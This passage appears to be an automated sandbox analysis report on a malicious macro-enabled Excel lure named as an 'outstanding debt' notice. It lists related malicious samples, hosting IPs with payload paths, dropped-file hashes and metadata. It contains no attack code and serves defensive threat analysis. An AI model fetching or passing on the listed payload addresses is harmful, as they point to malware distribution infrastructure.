                                                                                                                                                Show All
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 92.122.145.220, 52.255.188.83, 52.109.20.75, 52.109.12.21, 52.109.88.39, 184.30.24.56, 20.50.102.62, 92.122.213.247, 92.122.213.194, 93.184.221.240, 20.82.210.154, 20.54.26.129
                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, blobcollector.events.data.trafficmanager.net
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                91.211.91.81Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  5.34.179.36Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                  45.153.229.23Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 45.153.229.23/44313,6048108796.dat

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  GREENFLOID-ASUAOutstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 5.34.179.36
                                                                                                                                                  tetup.exeGet hashmaliciousBrowse
                                                                                                                                                  • 107.181.174.176
                                                                                                                                                  ba820cf3_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                  • 195.123.238.191
                                                                                                                                                  a8331229_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                  • 195.123.238.191
                                                                                                                                                  5f0e0f15_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                  • 195.123.238.191
                                                                                                                                                  2f50000.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.90.59.62
                                                                                                                                                  9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 82.118.21.70
                                                                                                                                                  9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 82.118.21.70
                                                                                                                                                  9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 82.118.21.70
                                                                                                                                                  EgW5u2WYG2.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.134.255.99
                                                                                                                                                  7IXb5bOTOQ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.134.255.61
                                                                                                                                                  DU61r0xvZ7.exeGet hashmaliciousBrowse
                                                                                                                                                  • 82.118.23.184
                                                                                                                                                  TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
                                                                                                                                                  • 91.90.195.7
                                                                                                                                                  10ba8cb2_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                  • 195.123.238.191
                                                                                                                                                  SThy2G7fGR.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.134.255.61
                                                                                                                                                  65cb803d8339bc32863bd557a882cf2016ad7945b18f3.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.134.255.61
                                                                                                                                                  73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 45.90.59.97
                                                                                                                                                  73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 45.90.59.97
                                                                                                                                                  73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 45.90.59.97
                                                                                                                                                  kVXWdr5oFQ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 195.123.233.63
                                                                                                                                                  HOSTFORYUAOutstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 91.211.91.81
                                                                                                                                                  Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 2.56.244.189
                                                                                                                                                  284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 91.211.91.71
                                                                                                                                                  284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 91.211.91.71
                                                                                                                                                  284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 91.211.91.71
                                                                                                                                                  9963433036-04282021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 91.211.91.71
                                                                                                                                                  9963433036-04282021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 91.211.91.71
                                                                                                                                                  9963433036-04282021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 91.211.91.71
                                                                                                                                                  7728839942-04012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 91.211.91.69
                                                                                                                                                  VOLIA-ASUAOutstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 45.153.229.23
                                                                                                                                                  7D1E.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.123.139.190
                                                                                                                                                  2f50000.exeGet hashmaliciousBrowse
                                                                                                                                                  • 91.203.5.165
                                                                                                                                                  jX16Cu330u.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.123.139.190
                                                                                                                                                  5jHZqgYHCZ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.123.139.190
                                                                                                                                                  z3LOkpYy4s.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.123.139.190
                                                                                                                                                  dl6jAtWJeR.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.123.139.190
                                                                                                                                                  YVNw1T4L7m.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.123.139.190
                                                                                                                                                  QsO4ETjF7s.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.123.139.190
                                                                                                                                                  Rk5T3e6g5m.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.123.139.190
                                                                                                                                                  9b3d7f02.exeGet hashmaliciousBrowse
                                                                                                                                                  • 91.203.5.155
                                                                                                                                                  a5DohSoj1A.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.123.139.190
                                                                                                                                                  Informationen,04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.137.155.222
                                                                                                                                                  Informationen,04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.137.155.222
                                                                                                                                                  Informationen,04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.137.155.222
                                                                                                                                                  M04UQNhcL3.docmGet hashmaliciousBrowse
                                                                                                                                                  • 45.137.155.37
                                                                                                                                                  M04UQNhcL3.docmGet hashmaliciousBrowse
                                                                                                                                                  • 45.137.155.37
                                                                                                                                                  M04UQNhcL3.docmGet hashmaliciousBrowse
                                                                                                                                                  • 45.137.155.37
                                                                                                                                                  hj4k7pqZ0S.docmGet hashmaliciousBrowse
                                                                                                                                                  • 45.137.155.37
                                                                                                                                                  hj4k7pqZ0S.docmGet hashmaliciousBrowse
                                                                                                                                                  • 45.137.155.37

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\23A21570-D324-4D14-8714-5F35806F5DD6
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):134558
                                                                                                                                                  Entropy (8bit):5.368391693613283
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:YcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:fEQ9DQW+zPXO8
                                                                                                                                                  MD5:BE3F830EA62C6D351E3A20171D7169CA
                                                                                                                                                  SHA1:5624164BB1A637D84F3317DD819DE878A6DF3457
                                                                                                                                                  SHA-256:27892735364DD6D8A0EFF8DCC7C373ED71780C0F787CA47929FCF9FA00C5DF58
                                                                                                                                                  SHA-512:9EB3D4ED9E7228E51AC7C7ABDF2C81444E11FBC5B772C23BED8F2001A4E0A48205F0336A3FE696873F70178729BDB65BDCB454738930ACF6552278079C466C3A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T15:38:26">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\38CCA1D5.jpg
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):92379
                                                                                                                                                  Entropy (8bit):7.654577060340879
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
                                                                                                                                                  MD5:4A425E6A5A885C0D0E2589506FD2244B
                                                                                                                                                  SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
                                                                                                                                                  SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
                                                                                                                                                  SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\3B910000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):119848
                                                                                                                                                  Entropy (8bit):7.698949263748929
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:qy0FVzvKINbjvw548LMb/oqKO8NnS8+60Kcrm:2FV+AbT648LM7D98Np+EEm
                                                                                                                                                  MD5:64D1D10A8D20607A7BC81479FD3CC8D1
                                                                                                                                                  SHA1:FC3F554F52C07C5CD54BF7CE976EFDF5DD7D2E9E
                                                                                                                                                  SHA-256:786A350C28D25E5D37979D6F254D5D1B575691CDD41D30AD3A6EFCB6A13C6FD7
                                                                                                                                                  SHA-512:6A24879180D6B6EEC0B4F64F95C371536176E4DE47DFCEC436A6CB8EF4AB9BA48D9CAEF5A3D46EA067FDACF30EEFEC74043D1543AA5B003A5D6971772BBC6C8F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):170164
                                                                                                                                                  Entropy (8bit):4.3663493242356
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:fablu5LVLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:frVg8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                  MD5:0292F3AD2B0D230F50C604404DBB431C
                                                                                                                                                  SHA1:E6FE207F157C732DBF3B35DF2855DF87C9451070
                                                                                                                                                  SHA-256:5CBFF9DC1472272ADAC6BD1FE227724ED2BD83731F93FBA55D5F4923D9BA63A9
                                                                                                                                                  SHA-512:691236899FEA6651611BF1A79FD14C9726C43B58C57B3EE2093D14802F9BB4B9EDE31318EFB927CEDB2CD510D867C64B3E1992B400D169D18A1ACE5DBB5BCA67
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Tue May 4 23:38:31 2021, atime=Tue May 4 23:38:31 2021, length=16384, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):904
                                                                                                                                                  Entropy (8bit):4.643894175136201
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:87tcXU9tuElPCH2ANM9SY5VA+WrjAZ/2bDxLLC5Lu4t2Y+xIBjKZm:8OS9B6AZiDxy87aB6m
                                                                                                                                                  MD5:0C8DEF7F1F1356BD2C0DCEAF57E870DF
                                                                                                                                                  SHA1:43F8B5DBA1CAFB41D1893009F02B18B23B20031C
                                                                                                                                                  SHA-256:0C8C2BBFBA1AEDA32680ED997BD4ADD92E04D1DCF550F12210FFD2E17F90DD5C
                                                                                                                                                  SHA-512:53EDE3CA8B2A08B2A46424B5520D9A4F756E28817BA0BB7093C77E7743CC91A0221FADEA548E1896EBB2BC944D7DF62EF4AF5678885187D678CBFE0F97DC18BD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: L..................F........N....-..1vI.FA..1vI.FA...@......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.......S.....................P..h.a.r.d.z.....~.1......R....Desktop.h.......Ny..R.......Y..............>.....B.=.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......210979...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-1636503299-05042021.xlsm.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Tue May 4 23:38:31 2021, atime=Tue May 4 23:38:31 2021, length=119832, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2380
                                                                                                                                                  Entropy (8bit):4.70450306537084
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8bH8MH69/vsbDkB6pbH8MH69/vsbDkB6:8j8k6NsbDkKj8k6NsbDk
                                                                                                                                                  MD5:2D2D77E82E07327478587BF566B288A0
                                                                                                                                                  SHA1:F552F7AE430ACBD04918BDFBDDAF0B9C4C0D32BA
                                                                                                                                                  SHA-256:1A9F76256C77929AB09A7ABE02E95F2EC1D445962D6BBDBB27EE25C59E7FCE48
                                                                                                                                                  SHA-512:FB5CBEDCB5AF814E6D872AE8703C9DE483D59EE2C632B024CA8BFD4F981CCDFA03982846F280484A90ABC6ED56063FA270FFFB878C5C03AD48C7F4F762471B22
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: L..................F.... ...Y...:...R.P.FA..R.P.FA...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.......S.....................P..h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny..R.......Y..............>.....xK..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .OUTSTA~1.XLS.........>Qvx.R......h......................`y.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.6.3.6.5.0.3.2.9.9.-.0.5.0.4.2.0.2.1...x.l.s.m.......o...............-.......n...........>.S......C:\Users\user\Desktop\Outstanding-Debt-1636503299-05042021.xlsm..@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.6.3.6.5.0.3.2.9.9.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......210979...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):178
                                                                                                                                                  Entropy (8bit):4.9670243919485335
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:oyBVomxWhl2Bbmdo0XV+lpSyEW92Bbmdo0XV+lpSmxWhl2Bbmdo0XV+lpSv:djSlzO0cpoW9zO0cpslzO0cpc
                                                                                                                                                  MD5:2148A1EF21AAB827E2B3D954EC3544B2
                                                                                                                                                  SHA1:EA9C3BB20AA72936251A9E9EBBA0B28D19FC74C0
                                                                                                                                                  SHA-256:E41A77FC9A0A1854503769CDA037AC2CC0A6C2BF96ADD9934263870F4597BCCF
                                                                                                                                                  SHA-512:FE181F2663639EF6703A98319A70D27A51913F847DD689930D65885A64480B05ED7E13D4F50BD418D68E9A04D0F534068A6FE21BD46D6F957B913E6CEFAE6FD2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-1636503299-05042021.xlsm.LNK=0..Outstanding-Debt-1636503299-05042021.xlsm.LNK=0..[misc]..Outstanding-Debt-1636503299-05042021.xlsm.LNK=0..
                                                                                                                                                  C:\Users\user\Desktop\FB910000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):119832
                                                                                                                                                  Entropy (8bit):7.69934282911382
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:syO8vKINbjvw548LMb/oqKO8NnS8+60Kcr6:mxAbT648LM7D98Np+EE6
                                                                                                                                                  MD5:AF067CE60168E23936E6F806A64CE72E
                                                                                                                                                  SHA1:A4B3BFD03C8C2A24A341E55551AECAAEFA3B4DB0
                                                                                                                                                  SHA-256:8A907030E152C2A0B23B3BD1C25BEB101DBA38F6CB6F766AE6BB3FA5223A23B5
                                                                                                                                                  SHA-512:A25283A2EE8328A5CD7C92FE1826640F923A0265D702F121D4576F684107C35D55ED865A3FC21F2F1B9BF25A7FC2C7C2AC035A58C64203FCEAED70FAC1CAC5F2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\Desktop\~$Outstanding-Debt-1636503299-05042021.xlsm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                  MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                  SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                  SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                  SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.68857711695949
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                  • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                  File name:Outstanding-Debt-1636503299-05042021.xlsm
                                                                                                                                                  File size:116934
                                                                                                                                                  MD5:770ec8230138bb271c449bdaf5da519b
                                                                                                                                                  SHA1:21a0bde033c46eab8d42e5b6d9431f52f5c6ce48
                                                                                                                                                  SHA256:43c9954c68907acc1f1a6e7d5cc90a3043f9da1c8416b079d182865abea734c7
                                                                                                                                                  SHA512:62ff4c914258230d73e372f4c6153c6eabcea6c43e7049c7bee3503ba8c9e02c09615d3fcdd2779d3e765674eedf41f2b68ac2a04a9f91fe4a2633f06223ab81
                                                                                                                                                  SSDEEP:3072:1kYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:WAbT648LM7D98Np+EdECx
                                                                                                                                                  File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74ecd0e2f696908c

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "/opt/package/joesandbox/database/analysis/404076/sample/Outstanding-Debt-1636503299-05042021.xlsm"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:False
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:True

                                                                                                                                                  Summary

                                                                                                                                                  Author:Rabota
                                                                                                                                                  Last Saved By:Noped
                                                                                                                                                  Create Time:2015-06-05T18:19:34Z
                                                                                                                                                  Last Saved Time:2021-05-04T08:11:27Z
                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                  Security:0

                                                                                                                                                  Document Summary

                                                                                                                                                  Thumbnail Scaling Desired:false
                                                                                                                                                  Company:
                                                                                                                                                  Contains Dirty Links:false
                                                                                                                                                  Shared Document:false
                                                                                                                                                  Changed Hyperlinks:false
